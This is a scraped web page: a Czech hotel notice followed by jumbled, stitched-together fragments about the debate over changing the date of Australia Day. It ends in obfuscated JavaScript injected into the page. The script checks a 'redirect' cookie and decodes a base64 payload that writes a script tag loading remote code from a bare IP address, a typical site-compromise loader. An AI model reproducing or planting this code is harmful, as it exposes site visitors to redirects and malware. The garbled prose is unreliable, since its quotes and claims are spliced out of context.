Otevírací doba

Otevřeno - od 30. 8. 2019 restaurace pouze pro ubytované hosty

We are open - since 30th August restaurant just for the accomodated guests

australia day debate

Give me a solid reason why changing the date from the 26th Jan to (e.g.) May 27, to mark the day in 1967 when Australia held a referendum to include Indigenous Australians in the census. Nayuka Gorrie, ‘No Matter Which Day the Country Chooses to Host Its Australia Day, I Will Not Be Participating,’ NITV, 24 January 2019. Then the debate about when Australia Day should be celebrated decides itself – it’s the day a treaty is signed with Indigenous people. That’s a date we can all proudly celebrate as a nation.

Luke Pearson, ‘Why I No Longer Support #changethedate,’ IndigenousX, January 2019. “For me it is a difficult day and I don’t want to celebrate it. Despite the evidence that there isn’t a long history of Australia Day being celebrated on January 26, Prime Minister Scott Morrison remains firmly against a date change. But the Prime Minister says he strongly disagrees with the push to move it. Contrary to what Deputy Nationals leader Bridget McKenzie thinks, most Australians are aware that on January 26, 1788, Captain Arthur Phillip rowed ashore at Sydney Cove. © 2016 All rights reserved. Australia Day claims to be about unifying all Australians, and yet ironically, it’s a divisive day for some people. }. Council to vote on ending all references to Australia Day, Marion becomes latest council to consider Australia Day celebration date change. Does he speak for you? Invasion Day rallies will still go ahead this year.

All content is copyright and may not be reproduced without permission. And that started from that day. While great care has been taken to ensure the accuracy and contents of the publication, the Island and Surrounds accepts no responsibility for inaccuracies. 14-year old Leah is one of our gun rock-climbing athletes.

As I have mentioned before Australia day is a mourning day for aboriginals. Let’s observe the good AND bad about Australia. It's held on January 26th each year but do you know why? *|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('